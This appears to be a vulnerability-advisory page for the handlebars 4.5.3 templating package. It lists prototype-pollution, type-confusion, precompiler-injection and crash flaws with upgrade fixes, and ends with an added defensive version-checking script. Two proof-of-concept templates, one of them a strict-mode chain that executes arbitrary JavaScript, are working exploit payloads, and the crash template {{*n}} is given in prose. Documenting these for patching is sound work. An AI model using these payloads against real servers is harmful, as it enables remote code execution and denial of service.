handlebars@4.5.3

Handlebars provides the power necessary to let you build semantic templates effectively with no frustration

  • latest version: 4.7.9

  • latest non vulnerable version

  • first published: 14 years ago

  • latest version published: 4 days ago

  • licenses detected

  • Direct Vulnerabilities

    Known vulnerabilities in the handlebars package. This does not include vulnerabilities belonging to this package’s dependencies.

    Vulnerability | Vulnerable Version
    (severity: C = critical, H = high, M = medium, L = low)

    • [M] Time-of-check Time-of-use (TOCTOU) Race Condition

    handlebars is an extension to the Mustache templating language.

    Affected versions of this package are vulnerable to Time-of-check Time-of-use (TOCTOU) Race Condition in the lookup function. An attacker can access properties that should be restricted by bypassing prototype-access controls through a time-of-check time-of-use (TOCTOU) flaw, where the security check and the actual property access are decoupled.

    Note: This is only exploitable if the { compat: true } compile option is enabled.

    How to fix Time-of-check Time-of-use (TOCTOU) Race Condition?

    Upgrade handlebars to version 4.7.9 or higher.

    Vulnerable versions: >=4.0.0 <4.7.9

    • [H] Improper Check for Unusual or Exceptional Conditions

    Affected versions of this package are vulnerable to Improper Check for Unusual or Exceptional Conditions through the registerDecorator path in lib/handlebars/compiler/javascript-compiler.js. An attacker can crash the Node.js process by supplying a template with malformed or unregistered decorator syntax, causing the compiled template to call an undefined decorator as a function. This affects applications that compile untrusted templates at request time, especially when the compile/render call is not wrapped in try/catch. A single malicious template such as {{*n}} can trigger an unhandled TypeError and terminate the process.

    How to fix Improper Check for Unusual or Exceptional Conditions?

    Upgrade handlebars to version 4.7.9 or higher.

    Vulnerable versions: >=4.0.0 <4.7.9

    • [H] Improper Encoding or Escaping of Output

    Affected versions of this package are vulnerable to Improper Encoding or Escaping of Output through the CLI precompiler in lib/precompiler.js. An attacker can execute arbitrary JavaScript in the generated bundle by supplying crafted template filenames or CLI options such as --namespace, --commonjs, --handlebarPath, or --map. The issue affects the precompiler output path used by bin/handlebars / lib/precompiler.js, where untrusted names and option values were concatenated into emitted JavaScript without escaping.

    How to fix Improper Encoding or Escaping of Output?

    Upgrade handlebars to version 4.7.9 or higher.

    Vulnerable versions: >=4.0.0 <4.7.9

    • [C] Access of Resource Using Incompatible Type ('Type Confusion')

    Affected versions of this package are vulnerable to Access of Resource Using Incompatible Type ('Type Confusion') via the resolvePartial and invokePartial functions. An attacker can execute arbitrary code on the server by supplying a crafted object as a dynamic partial in the template context, which is then compiled and executed as JavaScript.

    Note: This is only exploitable if the template uses dynamic partial lookups and the attacker can control the context property used for the lookup.

    How to fix Access of Resource Using Incompatible Type ('Type Confusion')?

    Upgrade handlebars to version 4.7.9 or higher.

    Vulnerable versions: >=4.0.0 <4.7.9

    • [C] Access of Resource Using Incompatible Type ('Type Confusion')

    Affected versions of this package are vulnerable to Access of Resource Using Incompatible Type ('Type Confusion') via the compile function. An attacker can execute arbitrary code by supplying a crafted Abstract Syntax Tree (AST) object with a malicious NumberLiteral value, which is emitted directly into generated JavaScript code without proper sanitization.

    Note: This allows the attacker to inject and run arbitrary commands on the server. This is only exploitable if user-controlled JSON is deserialized and passed directly to the compile function.

    How to fix Access of Resource Using Incompatible Type ('Type Confusion')?

    Upgrade handlebars to version 4.7.9 or higher.

    Vulnerable versions: >=4.0.0 <4.7.9

    • [C] Access of Resource Using Incompatible Type ('Type Confusion')

    Affected versions of this package are vulnerable to Access of Resource Using Incompatible Type ('Type Confusion') via manipulation of the @partial-block variable in the template data context. An attacker can execute arbitrary JavaScript code on the server by overwriting @partial-block with a crafted Handlebars AST and triggering its evaluation through a subsequent invocation.

    Note: This is only exploitable if helpers that accept arbitrary objects are registered and allow mutation of the data context.

    How to fix Access of Resource Using Incompatible Type ('Type Confusion')?

    Upgrade handlebars to version 4.7.9 or higher.

    Vulnerable versions: >=4.0.0 <4.7.9

    • [L] Prototype Pollution

    Affected versions of this package are vulnerable to Prototype Pollution via the resolvePartial function. An attacker can inject malicious scripts into rendered output by polluting Object.prototype with a key matching a partial reference, causing unescaped content to be rendered.

    Note: This is only exploitable if the attacker knows or can guess the name of a partial reference used in a template.

    How to fix Prototype Pollution?

    Upgrade handlebars to version 4.7.9 or higher.

    Vulnerable versions: >=4.0.0 <4.7.9

    • [M] Prototype Pollution

    Affected versions of this package are vulnerable to Prototype Pollution when selecting certain compiling options to compile templates coming from an untrusted source.

    POC

    <script src="https://cdn.jsdelivr.net/npm/handlebars@latest/dist/handlebars.js"></script>
    <script>
    // compile the template
    var s2 = `{{'a/.") || alert("Vulnerable Handlebars JS when compiling in compat mode'}}`;
    var template = Handlebars.compile(s2, {
      compat: true
    });
    // execute the compiled template and print the output to the console
    console.log(template({}));
    </script>

    How to fix Prototype Pollution?

    Upgrade handlebars to version 4.7.7 or higher.

    Vulnerable versions: <4.7.7

    • [H] Remote Code Execution (RCE)

    Affected versions of this package are vulnerable to Remote Code Execution (RCE) when selecting certain compiling options to compile templates coming from an untrusted source.

    POC

    <script src="https://cdn.jsdelivr.net/npm/handlebars@latest/dist/handlebars.js"></script>
    <script>
    // compile the template
    var s = `
    {{#with (__lookupGetter__ "__proto__")}}
    {{#with (./constructor.getOwnPropertyDescriptor . "valueOf")}}
    {{#with ../constructor.prototype}}
    {{../../constructor.defineProperty . "hasOwnProperty" ..}}
    {{/with}}
    {{/with}}
    {{/with}}
    {{#with "constructor"}}
    {{#with split}}
    {{pop (push "alert('Vulnerable Handlebars JS when compiling in strict mode');")}}
    {{#with .}}
    {{#with (concat (lookup join (slice 0 1)))}}
    {{#each (slice 2 3)}}
    {{#with (apply 0 ../..)}}
    {{.}}
    {{/with}}
    {{/each}}
    {{/with}}
    {{/with}}
    {{/with}}
    {{/with}}
    `;
    var template = Handlebars.compile(s, {
      strict: true
    });
    // execute the compiled template and print the output to the console
    console.log(template({}));
    </script>

    How to fix Remote Code Execution (RCE)?

    Upgrade handlebars to version 4.7.7 or higher.

    Vulnerable versions: <4.7.7

    • [M] Prototype Pollution

    Affected versions of this package are vulnerable to Prototype Pollution. Prototype access to the template engine allows for potential code execution.

    How to fix Prototype Pollution?

    Upgrade handlebars to version 4.6.0 or higher.

    Vulnerable versions: <4.6.0
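As an added defender-side example (not code from this page or from the handlebars project), the check below reports whether a pinned handlebars version falls inside the vulnerable ranges listed above and flags the compile options the advisories name as preconditions (compat for the TOCTOU bypass and compat-mode prototype pollution, strict for the RCE). It assumes plain x.y.z versions and the ">=a.b.c <x.y.z" / "<x.y.z" range form used on this page; the short labels on each range are mine.

```javascript
// Added example, not from the Snyk page or the handlebars project.
// Ranges are copied from the advisories above; the labels are a summary, not Snyk text.
const ADVISORIES = [
  { range: '>=4.0.0 <4.7.9', label: 'TOCTOU lookup, decorator crash, precompiler escaping, type confusion, partial pollution' },
  { range: '<4.7.7',         label: 'prototype pollution (compat) and RCE (strict)' },
  { range: '<4.6.0',         label: 'prototype pollution' },
];

// Assumption: plain semver "x.y.z" without prerelease or build tags.
function parseVersion(v) {
  const m = /^(\d+)\.(\d+)\.(\d+)$/.exec(v.trim());
  if (!m) throw new Error(`unsupported version string: ${v}`);
  return m.slice(1, 4).map(Number);
}

// Lexicographic compare of [major, minor, patch]; returns -1, 0 or 1.
function compareVersions(a, b) {
  const [x, y] = [parseVersion(a), parseVersion(b)];
  for (let i = 0; i < 3; i++) if (x[i] !== y[i]) return x[i] < y[i] ? -1 : 1;
  return 0;
}

// A range is a space-separated list of comparators that must all hold.
function satisfies(version, range) {
  return range.split(/\s+/).every((comparator) => {
    const m = /^(>=|<=|>|<|=)?(\d+\.\d+\.\d+)$/.exec(comparator);
    if (!m) throw new Error(`unsupported comparator: ${comparator}`);
    const d = compareVersions(version, m[2]);
    switch (m[1] || '=') {
      case '>=': return d >= 0;
      case '<=': return d <= 0;
      case '>':  return d > 0;
      case '<':  return d < 0;
      default:   return d === 0;
    }
  });
}

// Ranges from the list above that the installed version falls into.
function affectedRanges(version) {
  return ADVISORIES.filter((a) => satisfies(version, a.range)).map((a) => a.range);
}

// Compile options the advisories name as preconditions for exploitation.
function riskyCompileOptions(options) {
  const warnings = [];
  if (options.compat) warnings.push('compat: precondition for the TOCTOU lookup bypass and compat-mode prototype pollution');
  if (options.strict) warnings.push('strict: precondition for the <4.7.7 RCE');
  return warnings;
}
```

Running affectedRanges('4.5.3') on the version this page describes returns all three ranges, which is what makes 4.7.9 the only fully clean upgrade target.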